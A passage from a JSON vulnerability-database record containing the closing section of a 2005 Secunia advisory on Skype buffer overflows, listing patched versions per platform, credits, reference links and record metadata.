1.4.*.84 or later.\r\n\r\nSkype for Mac OS X:\r\nUpdate to Release 1.3.*.17 or later.\r\n\r\nSkype for Linux:\r\nUpdate to Release 1.2.*.18 or later.\r\n\r\nSkype for Pocket PC:\r\nNo patch is yet available.\r\n\r\nPROVIDED AND/OR DISCOVERED BY:\r\n1-2) Mark Rowe, Pentest Limited.\r\n3) Imad Lahoud, EADS Corporate Research Center.\r\n\r\nORIGINAL ADVISORY:\r\nhttp://www.skype.com/security/skype-sb-2005-02.html\r\nhttp://www.skype.com/security/skype-sb-2005-03.html\r\n\r\nOTHER REFERENCES:\r\nSA13191:\r\nhttp://secunia.com/advisories/13191/\r\n\r\n----------------------------------------------------------------------\r\n\r\nAbout:\r\nThis Advisory was delivered by Secunia as a free service to help\r\neverybody keeping their systems up to date against the latest\r\nvulnerabilities.\r\n\r\nSubscribe:\r\nhttp://secunia.com/secunia_security_advisories/\r\n\r\nDefinitions: (Criticality, Where etc.)\r\nhttp://secunia.com/about_secunia_advisories/\r\n\r\n\r\nPlease Note:\r\nSecunia recommends that you verify all advisories you receive by\r\nclicking the link.\r\nSecunia NEVER sends attached files with advisories.\r\nSecunia does not advise people to install third party patches, only\r\nuse those supplied by the vendor.\r\n", "modified": "2005-10-25T00:00:00", "published": "2005-10-25T00:00:00", "id": "SECURITYVULNS:DOC:10038", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:10038", "title": "[SA17305] Skype Multiple Buffer Overflow Vulnerabilities", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}